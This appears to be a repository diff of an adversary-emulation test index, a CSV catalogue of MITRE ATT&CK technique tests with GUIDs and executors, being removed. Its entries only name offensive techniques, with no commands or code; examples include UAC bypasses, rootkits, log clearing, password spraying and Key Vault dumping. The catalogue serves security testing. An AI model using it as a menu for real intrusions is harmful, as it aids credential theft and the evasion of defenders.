7 defense-evasion T1562.008 Impair Defenses: Disable Cloud Logs 6 AWS - Remove VPC Flow Logs using Stratus 93c150f5-ad7b-4ee3-8992-df06dec2ac79 sh
8 defense-evasion T1562.008 Impair Defenses: Disable Cloud Logs 7 AWS - CloudWatch Log Group Deletes 89422c87-b57b-4a04-a8ca-802bb9d06121 sh
9 defense-evasion T1562.008 Impair Defenses: Disable Cloud Logs 8 AWS CloudWatch Log Stream Deletes 33ca84bc-4259-4943-bd36-4655dc420932 sh
10 defense-evasion T1562.008 Impair Defenses: Disable Cloud Logs 10 GCP - Delete Activity Event Log d56152ec-01d9-42a2-877c-aac1f6ebe8e6 sh
11 defense-evasion T1578.001 Modify Cloud Compute Infrastructure: Create Snapshot 1 AWS - Create Snapshot from EBS Volume a3c09662-85bb-4ea8-b15b-6dc8a844e236 sh
12 defense-evasion T1578.001 Modify Cloud Compute Infrastructure: Create Snapshot 2 Azure - Create Snapshot from Managed Disk 89e69b4b-3458-4ec6-b819-b3008debc1bc sh
13 defense-evasion T1578.001 Modify Cloud Compute Infrastructure: Create Snapshot 3 GCP - Create Snapshot from Persistent Disk e6fbc036-91e7-4ad3-b9cb-f7210f40dd5d sh
14 defense-evasion T1078.004 Valid Accounts: Cloud Accounts 1 Creating GCP Service Account and Service Account Key 9fdd83fd-bd53-46e5-a716-9dec89c8ae8e sh
15 defense-evasion T1078.004 Valid Accounts: Cloud Accounts 2 Azure Persistence Automation Runbook Created or Modified 348f4d14-4bd3-4f6b-bd8a-61237f78b3ac powershell
16 defense-evasion T1078.004 Valid Accounts: Cloud Accounts 3 GCP - Create Custom IAM Role 3a159042-69e6-4398-9a69-3308a4841c85 sh
17 credential-access T1552.005 Unsecured Credentials: Cloud Instance Metadata API 2 Azure - Dump Azure Instance Metadata from Virtual Machines cc99e772-4e18-4f1f-b422-c5cdd1bfd7b7 powershell
18 credential-access T1552 Unsecured Credentials 1 AWS - Retrieve EC2 Password Data using stratus a21118de-b11e-4ebd-b655-42f11142df0c sh
19 credential-access T1110.003 Brute Force: Password Spraying 9 AWS - Password Spray an AWS using GoAWSConsoleSpray 9c10d16b-20b1-403a-8e67-50ef7117ed4e sh
20 credential-access T1528 Steal Application Access Token 1 Azure - Functions code upload - Functions code injection via Blob upload 9a5352e4-56e5-45c2-9b3f-41a46d3b3a43 powershell
21 credential-access T1528 Steal Application Access Token 2 Azure - Functions code upload - Functions code injection via File Share modification to retrieve the Functions identity access token 67aaf4cb-54ce-42e2-ab56-e0a9bcc089b1 powershell
22 credential-access T1555.006 Credentials from Password Stores: Cloud Secrets Management Stores 1 Azure - Dump All Azure Key Vaults with Microburst 1b83cddb-eaa7-45aa-98a5-85fb0a8807ea powershell
23 impact T1485 Data Destruction 4 GCP - Delete Bucket 4ac71389-40f4-448a-b73f-754346b3f928 sh
24 discovery T1580 Cloud Infrastructure Discovery 1 AWS - EC2 Enumeration from Cloud Instance 99ee161b-dcb1-4276-8ecb-7cfdcb207820 sh
25 discovery T1580 Cloud Infrastructure Discovery 2 AWS - EC2 Security Group Enumeration 99b38f24-5acc-4aa3-85e5-b7f97a5d37ac command_prompt
26 discovery T1619 Cloud Storage Object Discovery 1 AWS S3 Enumeration 3c7094f8-71ec-4917-aeb8-a633d7ec4ef5 sh
27 discovery T1619 Cloud Storage Object Discovery 2 Azure - Enumerate Storage Account Objects via Shared Key authorization using Azure CLI 070322a4-2c60-4c50-8ffb-c450a34fe7bf powershell
28 discovery T1619 Cloud Storage Object Discovery 3 Azure - Scan for Anonymous Access to Azure Storage (Powershell) 146af1f1-b74e-4aa7-9895-505eb559b4b0 powershell
29 discovery T1619 Cloud Storage Object Discovery 4 Azure - Enumerate Azure Blobs with MicroBurst 3dab4bcc-667f-4459-aea7-4162dd2d6590 powershell
30 discovery T1201 Password Policy Discovery 12 Examine AWS Password Policy 15330820-d405-450b-bd08-16b5be5be9f4 sh
31 discovery T1526 Cloud Service Discovery 1 Azure - Dump Subscription Data with MicroBurst 1e40bb1d-195e-401e-a86b-c192f55e005c powershell
32 discovery T1526 Cloud Service Discovery 2 AWS - Enumerate common cloud services aa8b9bcc-46fa-4a59-9237-73c7b93a980c powershell
33 discovery T1526 Cloud Service Discovery 3 Azure - Enumerate common cloud services 58f57c8f-db14-4e62-a4d3-5aaf556755d7 powershell
34 collection T1530 Data from Cloud Storage Object 1 AWS - Scan for Anonymous Access to S3 979356b9-b588-4e49-bba4-c35517c484f5 sh
35 collection T1530 Data from Cloud Storage Object 2 Azure - Dump Azure Storage Account Objects via Azure CLI 67374845-b4c8-4204-adcc-9b217b65d4f1 powershell
36 persistence T1098.001 Account Manipulation: Additional Cloud Credentials 3 AWS - Create Access Key and Secret Key 8822c3b0-d9f9-4daf-a043-491160a31122 sh
37 persistence T1136.003 Create Account: Cloud Account 1 AWS - Create a new IAM user 8d1c2368-b503-40c9-9057-8e42f21c58ad sh
38 persistence T1098 Account Manipulation 3 AWS - Create a group and add a user to that group 8822c3b0-d9f9-4daf-a043-49f110a31122 sh
39 persistence T1098 Account Manipulation 6 Azure - adding user to Azure role in subscription 1a94b3fc-b080-450a-b3d8-6d9b57b472ea powershell
40 persistence T1098 Account Manipulation 7 Azure - adding service principal to Azure role in subscription c8f4bc29-a151-48da-b3be-4680af56f404 powershell
41 persistence T1098 Account Manipulation 17 GCP - Delete Service Account Key 7ece1dea-49f1-4d62-bdcc-5801e3292510 sh
42 persistence T1078.004 Valid Accounts: Cloud Accounts 1 Creating GCP Service Account and Service Account Key 9fdd83fd-bd53-46e5-a716-9dec89c8ae8e sh
43 persistence T1078.004 Valid Accounts: Cloud Accounts 2 Azure Persistence Automation Runbook Created or Modified 348f4d14-4bd3-4f6b-bd8a-61237f78b3ac powershell
44 persistence T1078.004 Valid Accounts: Cloud Accounts 3 GCP - Create Custom IAM Role 3a159042-69e6-4398-9a69-3308a4841c85 sh
45 privilege-escalation T1098.001 Account Manipulation: Additional Cloud Credentials 3 AWS - Create Access Key and Secret Key 8822c3b0-d9f9-4daf-a043-491160a31122 sh
46 privilege-escalation T1098 Account Manipulation 3 AWS - Create a group and add a user to that group 8822c3b0-d9f9-4daf-a043-49f110a31122 sh
47 privilege-escalation T1098 Account Manipulation 6 Azure - adding user to Azure role in subscription 1a94b3fc-b080-450a-b3d8-6d9b57b472ea powershell
48 privilege-escalation T1098 Account Manipulation 7 Azure - adding service principal to Azure role in subscription c8f4bc29-a151-48da-b3be-4680af56f404 powershell
49 privilege-escalation T1098 Account Manipulation 17 GCP - Delete Service Account Key 7ece1dea-49f1-4d62-bdcc-5801e3292510 sh
50 privilege-escalation T1078.004 Valid Accounts: Cloud Accounts 1 Creating GCP Service Account and Service Account Key 9fdd83fd-bd53-46e5-a716-9dec89c8ae8e sh
51 privilege-escalation T1078.004 Valid Accounts: Cloud Accounts 2 Azure Persistence Automation Runbook Created or Modified 348f4d14-4bd3-4f6b-bd8a-61237f78b3ac powershell
52 privilege-escalation T1078.004 Valid Accounts: Cloud Accounts 3 GCP - Create Custom IAM Role 3a159042-69e6-4398-9a69-3308a4841c85 sh
53 initial-access T1078.004 Valid Accounts: Cloud Accounts 1 Creating GCP Service Account and Service Account Key 9fdd83fd-bd53-46e5-a716-9dec89c8ae8e sh
54 initial-access T1078.004 Valid Accounts: Cloud Accounts 2 Azure Persistence Automation Runbook Created or Modified 348f4d14-4bd3-4f6b-bd8a-61237f78b3ac powershell
55 initial-access T1078.004 Valid Accounts: Cloud Accounts 3 GCP - Create Custom IAM Role 3a159042-69e6-4398-9a69-3308a4841c85 sh
56 execution T1651 Cloud Administration Command 1 AWS Run Command (and Control) a3cc9c95-c160-4b86-af6f-84fba87bfd30 powershell
57 execution T1648 Serverless Execution 1 Lambda Function Hijack 87a4a141-c2bb-49d1-a604-8679082d8b91 powershell
atomics/Indexes/Indexes-CSV/index.csv
-2273
View File
@@ -1,2273 +0,0 @@
Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name
defense-evasion,T1055.011,Process Injection: Extra Window Memory Injection,1,Process Injection via Extra Window Memory (EWM) x64 executable,93ca40d2-336c-446d-bcef-87f14d438018,powershell
defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,1,Rundll32 execute JavaScript Remote Payload With GetObject,57ba4ce9-ee7a-4f27-9928-3c70c489b59d,command_prompt
defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,2,Rundll32 execute VBscript command,638730e7-7aed-43dc-bf8c-8117f805f5bb,command_prompt
defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,3,Rundll32 execute VBscript command using Ordinal number,32d1cf1b-cbc2-4c09-8d05-07ec5c83a821,command_prompt
defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,4,Rundll32 advpack.dll Execution,d91cae26-7fc1-457b-a854-34c8aad48c89,command_prompt
defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,5,Rundll32 ieadvpack.dll Execution,5e46a58e-cbf6-45ef-a289-ed7754603df9,command_prompt
defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,6,Rundll32 syssetup.dll Execution,41fa324a-3946-401e-bbdd-d7991c628125,command_prompt
defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,7,Rundll32 setupapi.dll Execution,71d771cd-d6b3-4f34-bc76-a63d47a10b19,command_prompt
defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,8,Execution of HTA and VBS Files using Rundll32 and URL.dll,22cfde89-befe-4e15-9753-47306b37a6e3,command_prompt
defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,9,Launches an executable using Rundll32 and pcwutl.dll,9f5d081a-ee5a-42f9-a04e-b7bdc487e676,command_prompt
defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,10,Execution of non-dll using rundll32.exe,ae3a8605-b26e-457c-b6b3-2702fd335bac,powershell
defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,11,Rundll32 with Ordinal Value,9fd5a74b-ba89-482a-8a3e-a5feaa3697b0,command_prompt
defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,12,Rundll32 with Control_RunDLL,e4c04b6f-c492-4782-82c7-3bf75eb8077e,command_prompt
defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,13,Rundll32 with desk.cpl,83a95136-a496-423c-81d3-1c6750133917,command_prompt
defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,14,Running DLL with .init extension and function,2d5029f0-ae20-446f-8811-e7511b58e8b6,command_prompt
defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,15,Rundll32 execute command via FileProtocolHandler,f3ad3c5b-1db1-45c1-81bf-d3370ebab6c8,command_prompt
defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,16,Rundll32 execute payload by calling RouteTheCall,8a7f56ee-10e7-444c-a139-0109438288eb,powershell
defense-evasion,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,1,Malicious PAM rule,4b9dde80-ae22-44b1-a82a-644bf009eb9c,sh
defense-evasion,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,2,Malicious PAM rule (freebsd),b17eacac-282d-4ca8-a240-46602cf863e3,sh
defense-evasion,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,3,Malicious PAM module,65208808-3125-4a2e-8389-a0a00e9ab326,sh
defense-evasion,T1222.002,"File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification",1,chmod - Change file or folder mode (numeric mode),34ca1464-de9d-40c6-8c77-690adf36a135,sh
defense-evasion,T1222.002,"File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification",2,chmod - Change file or folder mode (symbolic mode),fc9d6695-d022-4a80-91b1-381f5c35aff3,sh
defense-evasion,T1222.002,"File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification",3,chmod - Change file or folder mode (numeric mode) recursively,ea79f937-4a4d-4348-ace6-9916aec453a4,sh
defense-evasion,T1222.002,"File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification",4,chmod - Change file or folder mode (symbolic mode) recursively,0451125c-b5f6-488f-993b-5a32b09f7d8f,bash
defense-evasion,T1222.002,"File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification",5,chown - Change file or folder ownership and group,d169e71b-85f9-44ec-8343-27093ff3dfc0,bash
defense-evasion,T1222.002,"File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification",6,chown - Change file or folder ownership and group recursively,b78598be-ff39-448f-a463-adbf2a5b7848,bash
defense-evasion,T1222.002,"File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification",7,chown - Change file or folder mode ownership only,967ba79d-f184-4e0e-8d09-6362b3162e99,sh
defense-evasion,T1222.002,"File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification",8,chown - Change file or folder ownership recursively,3b015515-b3d8-44e9-b8cd-6fa84faf30b2,bash
defense-evasion,T1222.002,"File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification",9,chattr - Remove immutable file attribute,e7469fe2-ad41-4382-8965-99b94dd3c13f,sh
defense-evasion,T1222.002,"File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification",10,chflags - Remove immutable file attribute,60eee3ea-2ebd-453b-a666-c52ce08d2709,sh
defense-evasion,T1222.002,"File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification",11,Chmod through c script,973631cf-6680-4ffa-a053-045e1b6b67ab,sh
defense-evasion,T1222.002,"File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification",12,Chmod through c script (freebsd),da40b5fe-3098-4b3b-a410-ff177e49ee2e,sh
defense-evasion,T1222.002,"File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification",13,Chown through c script,18592ba1-5f88-4e3c-abc8-ab1c6042e389,sh
defense-evasion,T1222.002,"File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification",14,Chown through c script (freebsd),eb577a19-b730-4918-9b03-c5edcf51dc4e,sh
defense-evasion,T1216.001,Signed Script Proxy Execution: Pubprn,1,PubPrn.vbs Signed Script Bypass,9dd29a1f-1e16-4862-be83-913b10a88f6c,command_prompt
defense-evasion,T1006,Direct Volume Access,1,Read volume boot sector via DOS device path (PowerShell),88f6327e-51ec-4bbf-b2e8-3fea534eab8b,powershell
defense-evasion,T1564.008,Hide Artifacts: Email Hiding Rules,1,New-Inbox Rule to Hide E-mail in M365,30f7d3d1-78e2-4bf0-9efa-a175b5fce2a9,powershell
defense-evasion,T1027.013,Obfuscated Files or Information: Encrypted/Encoded File,1,Decode Eicar File and Write to File,7693ccaa-8d64-4043-92a5-a2eb70359535,powershell
defense-evasion,T1027.013,Obfuscated Files or Information: Encrypted/Encoded File,2,Decrypt Eicar File and Write to File,b404caaa-12ce-43c7-9214-62a531c044f7,powershell
defense-evasion,T1014,Rootkit,1,Loadable Kernel Module based Rootkit,dfb50072-e45a-4c75-a17e-a484809c8553,sh
defense-evasion,T1014,Rootkit,2,Loadable Kernel Module based Rootkit,75483ef8-f10f-444a-bf02-62eb0e48db6f,sh
defense-evasion,T1014,Rootkit,3,dynamic-linker based rootkit (libprocesshider),1338bf0c-fd0c-48c0-9e65-329f18e2c0d3,sh
defense-evasion,T1014,Rootkit,4,Loadable Kernel Module based Rootkit (Diamorphine),0b996469-48c6-46e2-8155-a17f8b6c2247,sh
defense-evasion,T1036.007,Masquerading: Double File Extension,1,File Extension Masquerading,c7fa0c3b-b57f-4cba-9118-863bf4e653fc,command_prompt
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,1,Bypass UAC using Event Viewer (cmd),5073adf8-9a50-4bd9-b298-a9bd2ead8af9,command_prompt
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,2,Bypass UAC using Event Viewer (PowerShell),a6ce9acf-842a-4af6-8f79-539be7608e2b,powershell
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,3,Bypass UAC using Fodhelper,58f641ea-12e3-499a-b684-44dee46bd182,command_prompt
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,4,Bypass UAC using Fodhelper - PowerShell,3f627297-6c38-4e7d-a278-fc2563eaaeaa,powershell
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,5,Bypass UAC using ComputerDefaults (PowerShell),3c51abf2-44bf-42d8-9111-dc96ff66750f,powershell
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,6,Bypass UAC by Mocking Trusted Directories,f7a35090-6f7f-4f64-bb47-d657bf5b10c1,command_prompt
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,7,Bypass UAC using sdclt DelegateExecute,3be891eb-4608-4173-87e8-78b494c029b7,powershell
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,8,Disable UAC using reg.exe,9e8af564-53ec-407e-aaa8-3cb20c3af7f9,command_prompt
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,9,Bypass UAC using SilentCleanup task,28104f8a-4ff1-4582-bcf6-699dce156608,command_prompt
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,10,UACME Bypass Method 23,8ceab7a2-563a-47d2-b5ba-0995211128d7,command_prompt
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,11,UACME Bypass Method 31,b0f76240-9f33-4d34-90e8-3a7d501beb15,command_prompt
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,12,UACME Bypass Method 33,e514bb03-f71c-4b22-9092-9f961ec6fb03,command_prompt
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,13,UACME Bypass Method 34,695b2dac-423e-448e-b6ef-5b88e93011d6,command_prompt
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,14,UACME Bypass Method 39,56163687-081f-47da-bb9c-7b231c5585cf,command_prompt
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,15,UACME Bypass Method 56,235ec031-cd2d-465d-a7ae-68bab281e80e,command_prompt
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,16,UACME Bypass Method 59,dfb1b667-4bb8-4a63-a85e-29936ea75f29,command_prompt
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,17,UACME Bypass Method 61,7825b576-744c-4555-856d-caf3460dc236,command_prompt
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,18,WinPwn - UAC Magic,964d8bf8-37bc-4fd3-ba36-ad13761ebbcc,powershell
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,19,WinPwn - UAC Bypass ccmstp technique,f3c145f9-3c8d-422c-bd99-296a17a8f567,powershell
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,20,WinPwn - UAC Bypass DiskCleanup technique,1ed67900-66cd-4b09-b546-2a0ef4431a0c,powershell
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,21,WinPwn - UAC Bypass DccwBypassUAC technique,2b61977b-ae2d-4ae4-89cb-5c36c89586be,powershell
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,22,Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key,251c5936-569f-42f4-9ac2-87a173b9e9b8,powershell
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,23,UAC Bypass with WSReset Registry Modification,3b96673f-9c92-40f1-8a3e-ca060846f8d9,powershell
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,24,Disable UAC - Switch to the secure desktop when prompting for elevation via registry key,85f3a526-4cfa-4fe7-98c1-dea99be025c7,powershell
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,25,Disable UAC notification via registry keys,160a7c77-b00e-4111-9e45-7c2a44eda3fd,command_prompt
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,26,Disable ConsentPromptBehaviorAdmin via registry keys,a768aaa2-2442-475c-8990-69cf33af0f4e,command_prompt
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,27,UAC bypassed by Utilizing ProgIDs registry.,b6f4645c-34ea-4c7c-98f2-d5a2747efb08,command_prompt
defense-evasion,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,1,Sudo usage,150c3a08-ee6e-48a6-aeaf-3659d24ceb4e,sh
defense-evasion,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,2,Sudo usage (freebsd),2bf9a018-4664-438a-b435-cc6f8c6f71b1,sh
defense-evasion,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,3,Unlimited sudo cache timeout,a7b17659-dd5e-46f7-b7d1-e6792c91d0bc,sh
defense-evasion,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,4,Unlimited sudo cache timeout (freebsd),a83ad6e8-6f24-4d7f-8f44-75f8ab742991,sh
defense-evasion,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,5,Disable tty_tickets for sudo caching,91a60b03-fb75-4d24-a42e-2eb8956e8de1,sh
defense-evasion,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,6,Disable tty_tickets for sudo caching (freebsd),4df6a0fe-2bdd-4be8-8618-a6a19654a57a,sh
defense-evasion,T1542.001,Pre-OS Boot: System Firmware,1,UEFI Persistence via Wpbbin.exe File Creation,b8a49f03-e3c4-40f2-b7bb-9e8f8fdddbf1,powershell
defense-evasion,T1574.011,Hijack Execution Flow: Services Registry Permissions Weakness,1,Service Registry Permissions Weakness,f7536d63-7fd4-466f-89da-7e48d550752a,powershell
defense-evasion,T1574.011,Hijack Execution Flow: Services Registry Permissions Weakness,2,Service ImagePath Change with reg.exe,f38e9eea-e1d7-4ba6-b716-584791963827,command_prompt
defense-evasion,T1036.005,Masquerading: Match Legitimate Name or Location,1,Execute a process from a directory masquerading as the current parent directory,812c3ab8-94b0-4698-a9bf-9420af23ce24,sh
defense-evasion,T1036.005,Masquerading: Match Legitimate Name or Location,2,Masquerade as a built-in system executable,35eb8d16-9820-4423-a2a1-90c4f5edd9ca,powershell
defense-evasion,T1036.005,Masquerading: Match Legitimate Name or Location,3,Masquerading cmd.exe as VEDetector.exe,03ae82a6-9fa0-465b-91df-124d8ca5c4e8,powershell
defense-evasion,T1564,Hide Artifacts,1,Extract binary files via VBA,6afe288a-8a8b-4d33-a629-8d03ba9dad3a,powershell
defense-evasion,T1564,Hide Artifacts,2,"Create a Hidden User Called ""$""",2ec63cc2-4975-41a6-bf09-dffdfb610778,command_prompt
defense-evasion,T1564,Hide Artifacts,3,"Create an ""Administrator "" user (with a space on the end)",5bb20389-39a5-4e99-9264-aeb92a55a85c,powershell
defense-evasion,T1564,Hide Artifacts,4,Create and Hide a Service with sc.exe,333c7de0-6fbe-42aa-ac2b-c7e40b18246a,command_prompt
defense-evasion,T1564,Hide Artifacts,5,Command Execution with NirCmd,2748ab4a-1e0b-4cf2-a2b0-8ef765bec7be,powershell
defense-evasion,T1484.002,Domain Trust Modification,1,Add Federation to Azure AD,8906c5d0-3ee5-4f63-897a-f6cafd3fdbb7,powershell
defense-evasion,T1562.009,Impair Defenses: Safe Boot Mode,1,Safe Mode Boot,2a78362e-b79a-4482-8e24-be397bce4d85,command_prompt
defense-evasion,T1497.001,Virtualization/Sandbox Evasion: System Checks,1,Detect Virtualization Environment (Linux),dfbd1a21-540d-4574-9731-e852bd6fe840,sh
defense-evasion,T1497.001,Virtualization/Sandbox Evasion: System Checks,2,Detect Virtualization Environment (FreeBSD),e129d73b-3e03-4ae9-bf1e-67fc8921e0fd,sh
defense-evasion,T1497.001,Virtualization/Sandbox Evasion: System Checks,3,Detect Virtualization Environment (Windows),502a7dc4-9d6f-4d28-abf2-f0e84692562d,powershell
defense-evasion,T1497.001,Virtualization/Sandbox Evasion: System Checks,4,Detect Virtualization Environment via ioreg,a960185f-aef6-4547-8350-d1ce16680d09,sh
defense-evasion,T1497.001,Virtualization/Sandbox Evasion: System Checks,5,Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows),4a41089a-48e0-47aa-82cb-5b81a463bc78,powershell
defense-evasion,T1497.001,Virtualization/Sandbox Evasion: System Checks,6,Detect Virtualization Environment using sysctl (hw.model),6beae646-eb4c-4730-95be-691a4094408c,sh
defense-evasion,T1497.001,Virtualization/Sandbox Evasion: System Checks,7,Check if System Integrity Protection is enabled,2b73cd9b-b2fb-4357-b9d7-c73c41d9e945,sh
defense-evasion,T1497.001,Virtualization/Sandbox Evasion: System Checks,8,Detect Virtualization Environment using system_profiler,e04d2e89-de15-4d90-92f9-a335c7337f0f,sh
defense-evasion,T1070.002,"Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs",1,rm -rf,989cc1b1-3642-4260-a809-54f9dd559683,sh
defense-evasion,T1070.002,"Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs",2,rm -rf,bd8ccc45-d632-481e-b7cf-c467627d68f9,sh
defense-evasion,T1070.002,"Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs",3,Delete log files using built-in log utility,653d39cd-bae7-499a-898c-9fb96b8b5cd1,sh
defense-evasion,T1070.002,"Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs",4,Truncate system log files via truncate utility,6290f8a8-8ee9-4661-b9cf-390031bf6973,sh
defense-evasion,T1070.002,"Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs",5,Truncate system log files via truncate utility (freebsd),14033063-ee04-4eaf-8f5d-ba07ca7a097c,sh
defense-evasion,T1070.002,"Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs",6,Delete log files via cat utility by appending /dev/null or /dev/zero,c23bdb88-928d-493e-b46d-df2906a50941,sh
defense-evasion,T1070.002,"Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs",7,Delete log files via cat utility by appending /dev/null or /dev/zero (freebsd),369878c6-fb04-48d6-8fc2-da9d97b3e054,sh
defense-evasion,T1070.002,"Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs",8,System log file deletion via find utility,bc8eeb4a-cc3e-45ec-aa6e-41e973da2558,sh
defense-evasion,T1070.002,"Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs",9,Overwrite macOS system log via echo utility,0208ea60-98f1-4e8c-8052-930dce8f742c,sh
defense-evasion,T1070.002,"Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs",10,Overwrite FreeBSD system log via echo utility,11cb8ee1-97fb-4960-8587-69b8388ee9d9,sh
defense-evasion,T1070.002,"Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs",11,Real-time system log clearance/deletion,848e43b3-4c0a-4e4c-b4c9-d1e8cea9651c,sh
defense-evasion,T1070.002,"Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs",12,Delete system log files via unlink utility,03013b4b-01db-437d-909b-1fdaa5010ee8,sh
defense-evasion,T1070.002,"Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs",13,Delete system log files via unlink utility (freebsd),45ad4abd-19bd-4c5f-a687-41f3eee8d8c2,sh
defense-evasion,T1070.002,"Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs",14,Delete system log files using shred utility,86f0e4d5-3ca7-45fb-829d-4eda32b232bb,sh
defense-evasion,T1070.002,"Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs",15,Delete system log files using srm utility,b0768a5e-0f32-4e75-ae5b-d036edcf96b6,sh
defense-evasion,T1070.002,"Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs",16,Delete system log files using OSAScript,810a465f-cd4f-47bc-b43e-d2de3b033ecc,sh
defense-evasion,T1070.002,"Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs",17,Delete system log files using Applescript,e62f8694-cbc7-468f-862c-b10cd07e1757,sh
defense-evasion,T1070.002,"Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs",18,Delete system journal logs via rm and journalctl utilities,ca50dd85-81ff-48ca-92e1-61f119cb1dcf,sh
defense-evasion,T1070.002,"Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs",19,Overwrite Linux Mail Spool,1602ff76-ed7f-4c94-b550-2f727b4782d4,bash
defense-evasion,T1070.002,"Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs",20,Overwrite Linux Log,d304b2dc-90b4-4465-a650-16ddd503f7b5,bash
defense-evasion,T1218.004,Signed Binary Proxy Execution: InstallUtil,1,CheckIfInstallable method call,ffd9c807-d402-47d2-879d-f915cf2a3a94,powershell
defense-evasion,T1218.004,Signed Binary Proxy Execution: InstallUtil,2,InstallHelper method call,d43a5bde-ae28-4c55-a850-3f4c80573503,powershell
defense-evasion,T1218.004,Signed Binary Proxy Execution: InstallUtil,3,InstallUtil class constructor method call,9b7a7cfc-dd2e-43f5-a885-c0a3c270dd93,powershell
defense-evasion,T1218.004,Signed Binary Proxy Execution: InstallUtil,4,InstallUtil Install method call,9f9968a6-601a-46ca-b7b7-6d4fe0f98f0b,powershell
defense-evasion,T1218.004,Signed Binary Proxy Execution: InstallUtil,5,InstallUtil Uninstall method call - /U variant,34428cfa-8e38-41e5-aff4-9e1f8f3a7b4b,powershell
